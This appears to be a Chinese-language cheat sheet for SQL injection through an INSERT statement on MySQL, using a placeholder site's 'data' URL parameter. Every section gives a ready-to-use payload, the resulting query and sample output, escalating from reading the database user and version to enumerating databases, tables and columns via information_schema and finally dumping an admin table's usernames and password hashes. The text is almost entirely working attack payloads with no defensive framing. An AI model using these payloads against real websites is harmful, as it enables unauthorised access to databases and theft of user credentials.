0x00 概要

注入以后想要的数据会在数据库中保存,用于可查看回显时使用

0x01 数据库版本/当前连接用户/当前连接的数据库

web语句: http://www.test.com/sql_add.php?data=user()

数据库语句: INSERT INTO test (test) value (user())

user(),database(),@@VERSION 剩下的自己替换

  1. mysql> select * from test order by id desc limit 1;
  2. +----+----------------+------+---------+
  3. | id | test           | map  | content |
  4. +----+----------------+------+---------+
  5. | 23 | root@localhost | NULL | NULL    |
  6. +----+----------------+------+---------+
  7. 1 row in set (0.00 sec)

0x02 库名

注意: LIMIT 0 修改会显示其他库名
例如:
LIMIT 0,1 修改为0 就是出1库
LIMIT 1,1 修改为1 就是出2库

web语句: http://www.test.com/sql_add.php?data=(select schema_name from information_schema.schemata limit 1,1)

数据库语句: INSERT INTO test (test) value ((select schema_name from information_schema.schemata limit 1,1))

  1. mysql> select * from test order by id desc limit 1;
  2. +----+-------+------+---------+
  3. | id | test  | map  | content |
  4. +----+-------+------+---------+
  5. | 24 | 74cms | NULL | NULL    |
  6. +----+-------+------+---------+
  7. 1 row in set (0.00 sec)

0x03 获取某表表名

注意: table_schema=xxx 修改为其他库会查出其他库的数据
例如:
table_schema=database() 会获取当前连接的库数据
table_schema=’test’ 会获取test库数据

注意: LIMIT 0 修改会爆出不同的表名
例如:
LIMIT 0,1 修改为0 就是出1表
LIMIT 1,1 修改为1 就是出2表

web语句: http://www.test.com/sql_add.php?data=(select table_name from information_schema.tables where table_schema=DATABASE() limit 0,1)

数据库语句: INSERT INTO test (test) value ((select table_name from information_schema.tables where table_schema=DATABASE() limit 0,1))

  1. mysql> select * from test order by id desc limit 1;
  2. +----+-----------+------+---------+
  3. | id | test      | map  | content |
  4. +----+-----------+------+---------+
  5. | 25 | tdb_admin | NULL | NULL    |
  6. +----+-----------+------+---------+
  7. 1 row in set (0.00 sec)

0x04 获取表字段

table_schema = “xx” 要看的数据库名
table_name = “xx” 要看的表名

limit 0 表示要爆的位置
例如:
表tdb_admin的字段为 id,usernam,password
limit 0 = id
limit 1 = username
limit 2 = password

web语句: http://www.test.com/sql_add.php?data=(select column_name from information_schema.columns where table_schema=DATABASE() AND table_name=’tdb_admin’ limit 1,1)

数据库语句-爆test库 tdb_admin表的字段名: INSERT INTO test (test) value ((select column_name from information_schema.columns where table_schema=DATABASE() AND table_name=’tdb_admin’ limit 1,1))

  1. mysql> select * from test order by id desc limit 1;
  2. +----+----------+------+---------+
  3. | id | test     | map  | content |
  4. +----+----------+------+---------+
  5. | 26 | username | NULL | NULL    |
  6. +----+----------+------+---------+
  7. 1 row in set (0.00 sec)

0x05 插入要读取的表内容

注意: limit 0 表示要显示那一条数据
limit 0 表示第一条
limit 1 表示第二条

web语句: http://www.test.com/sql_add.php?data=(select concat(0x7e,id,0x3a,username,0x3a,password,0x7e) from test.tdb_admin limit 0,1)

数据库语句: INSERT INTO test (test) value ((select concat(0x7e,字段名,0x3a,字段名,0x3a,字段名,0x7e) from 库名.表名 limit 0,1))

  1. mysql> select * from test order by id desc limit 1;
  2. +----+--------------------------------------------+------+---------+
  3. | id | test                                       | map  | content |
  4. +----+--------------------------------------------+------+---------+
  5. | 28 | ~1:admin:7fef6171469e80d32c0559f88b377245~ | NULL | NULL    |
  6. +----+--------------------------------------------+------+---------+
  7. 1 row in set (0.00 sec)